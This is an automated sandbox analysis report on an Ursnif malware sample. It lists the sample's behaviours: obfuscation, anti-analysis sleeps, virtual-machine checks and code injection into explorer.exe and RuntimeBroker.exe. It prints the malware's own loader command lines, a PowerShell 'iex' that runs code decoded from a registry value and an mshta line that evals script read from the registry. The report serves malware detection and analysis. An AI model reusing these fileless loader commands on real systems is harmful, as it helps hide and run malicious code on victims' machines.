Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05146450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,3_2_05146450
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05156D07 push ecx; ret 3_2_05156D17
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051569A0 push ecx; ret 3_2_051569A9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0515BA4E push ds; retn 0002h3_2_0515BA69
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0515BA74 push edx; retn 0002h3_2_0515BA75
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0515BA98 push edx; ret 3_2_0515BAAD
Source: C:\Windows\System32\control.exeCode function: 15_2_00C1B849 push 3B000001h; retf 15_2_00C1B84E
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337411B849 push 3B000001h; retf 18_2_000001337411B84E

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 3720, type: MEMORY
Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6550
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1730
Found large amount of non-executed APIsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 7.2 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep time: -922337203685477s >= -30000s
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_0513CDF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0514940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_0514940E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05138181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_05138181
Contains functionality to query local drivesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05147CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,3_2_05147CDC
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000010.00000000.1134184918.0000000007340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000010.00000000.1134184918.0000000007340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000010.00000000.1134184918.0000000007340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000010.00000000.1134184918.0000000007340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit pointsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05138560 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_05138560
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05146450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,3_2_05146450
Contains functionality to register its own exception handlerShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513C0D6 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,LdrInitializeThunk,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,3_2_0513C0D6

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\System32\control.exe base: CC0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 25F0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 13373E90000 protect: page execute and read and write
Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F26FDE0000 protect: page execute and read and write
Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2DB879C0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writableShow sources
Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF7352A1000 protect: page execute and read and write
Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF7352A1000 protect: page execute read
Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF7352A1000 protect: page execute and read and write
Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute and read and write
Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute read
Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute and read and write
Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute and read and write
Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute read
Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 352A1000
Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D51000
Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D51000
Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D51000
Injects code into the Windows Explorer (explorer.exe)Show sources
Source: C:\Windows\System32\control.exeMemory written: PID: 2928 base: 7FF7352A1000 value: EB
Source: C:\Windows\System32\control.exeMemory written: PID: 2928 base: 25F0000 value: 00
Source: C:\Windows\System32\control.exeMemory written: PID: 2928 base: 7FF7352A1000 value: 48
Maps a DLL or memory area into another processShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 3720Jump to behavior
Source: C:\Windows\System32\control.exeThread register set: target process: 2928
Source: C:\Windows\System32\control.exeThread register set: target process: 5664
Source: C:\Windows\explorer.exeThread register set: target process: 3552
Source: C:\Windows\explorer.exeThread register set: target process: 3872
Writes to foreign memory regionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: CC0000Jump to behavior
Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF7352A1000
Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 25F0000
Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF7352A1000
Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF786215FD0
Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 13373E90000
Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF786215FD0
Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000
Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F26FDE0000
Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000
Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000
Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DB879C0000
Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF703D51000
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\iUBu.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmpBinary or memory string: hProgram ManagerWE
